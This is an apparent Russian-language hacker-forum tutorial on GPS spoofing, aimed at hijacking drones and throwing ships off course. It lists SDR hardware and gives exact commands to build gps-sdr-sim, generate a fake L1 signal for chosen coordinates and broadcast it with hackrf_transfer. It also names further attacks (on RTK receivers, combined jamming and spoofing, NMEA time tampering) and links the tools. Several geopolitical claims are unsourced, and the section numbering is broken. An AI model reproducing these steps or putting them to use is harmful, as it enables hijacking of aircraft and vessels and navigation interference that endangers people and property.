Думаешь, угнать дрон или сбить с курса корабль — это сложно? Что там нужны спутниковые тарелки и доступ к ЦУПу?
А я скажу: купи на Али HackRF One за 200 баксов, скачай пару скриптов с GitHub и включи наглость.
GPS-приемники тупые. Они берут любой сигнал, который похож на спутниковый, и верят ему. Они не проверяют, откуда он пришёл. Просто считают координаты.
Твой дрон доверяет спутникам больше, чем своей матери. И это его главная слабость.
---
1. Что такое GPS-спуфинг
Ты транслируешь поддельный GPS-сигнал, который выглядит как настоящий. Приемник цели думает, что это легитимный спутник, и начинает считать координаты, которые ты ему подсунул.
От глушения (jamming) спуфинг отличается тем, что цель не теряет сигнал — она просто получает неправильные координаты. Глушение заметят быстро. Спуфинг — тихо. Цель даже не подозревает, что её ведут не туда.
Ты не просто угнал дрон. Ты угнал его восприятие реальности. Это как «Матрица», только для железа.
---
2. Оборудование и софт
[list]
[] HackRF One — твой главный инструмент (1 MHz – 6 GHz, GPS на 1.5 GHz)
[] Альтернативы: LimeSDR, USRP, BladeRF — если бюджет позволяет[/list]
[list]
[] gps-sdr-sim — генератор GPS-сигналов (создаёт файл траектории)
[] hackrf_transfer — отправка сигнала в эфир
[*] GNU Radio — для продвинутых[/list]
---
3. Пошаговая инструкция — угоняем дрон
Шаг 1. Узнай координаты цели — через MarineTraffic, наблюдение или перехват телеметрии.
Шаг 2. Сгенерируй поддельный сигнал
git clone https://github.com/osqzss/gps-sdr-sim
cd gps-sdr-sim
make
./gps-sdr-sim -e brdc3540.14n -l 50.4501,30.5234,100 -b 8 -d 300Параметры: -e эфемериды, -l начальная позиция (Киев), -b битность, -d длительность. На выходе — gpssim.bin.
Шаг 3. Отправь сигнал в эфир
hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0-f — частота L1 GPS (1575.42 МГц), -s частота дискретизации, -a усилитель, -x усиление.
Готово. Дрон получает фейковые координаты и смещается в нужную сторону.
Если всё сделано правильно — дрон улетит туда, куда ты захочешь. Он будет думать, что он в Киеве, а на самом деле — в Москве. Забавно.
---
4. Продвинутые техники
[list]
[] RTKiller — атака на RTK-приемники (сантиметровая точность). Подмена корректирующего сигнала — ошибка в десятки метров.
[] SpAmming — глушение + спуфинг одновременно. Сначала глушишь реальный сигнал, потом подсовываешь свой.
[*] Атака через NTP — подмени NMEA-строки на GPS-сервере, и все клиенты получат неверное время.[/list]
---
5. Реальные примеры
[] Иран vs Starlink (2024-2025) — спуфинг для подавления терминалов.
[] Российские спутники «Купол» глушат GPS над Европой, влияя на низкоорбитальные спутники.
[] Система РЭБ «Тобол» — выводит из строя навигационные спутники GPS, Galileo, Starlink.
Когда Россия глушит GPS над Европой — это геополитика. Когда ты глушишь GPS над своим городом — это статья. Чувствуешь разницу?
8. Инструменты
gps-sdr-sim — github.com/osqzss/gps-sdr-sim
hackrf — github.com/greatscottgadgets/hackrf
NMEAdesync — github.com/zxsecurity/NMEAdesync
GNSS-SDR — github.com/gnss-sdr/gnss-sdr---
Вывод
GPS-спуфинг — реально. Дешево. Работает на большинстве устройств.
Защита существует. Но никто её не использует. Потому что дорого. И всем похуй.